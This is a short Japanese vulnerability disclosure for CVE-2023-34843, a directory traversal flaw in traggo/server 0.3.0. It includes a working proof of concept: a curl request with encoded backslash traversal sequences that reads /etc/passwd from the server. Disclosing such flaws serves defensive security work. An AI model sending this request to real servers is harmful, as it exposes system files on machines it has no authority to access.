
CVE-2023-34843の公開開示
CVE-2023-34843 の開示
traggo/server バージョン 0.3.0 はディレクトリトラバーサルに対して脆弱です。
再現手順:
エンドポイント/サーバーに traggo/server をセットアップします。 https://traggo.net/install/
次のURLにGETリクエストを送信します。 curl -X GET http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd
/etc/passwd の内容を表示します。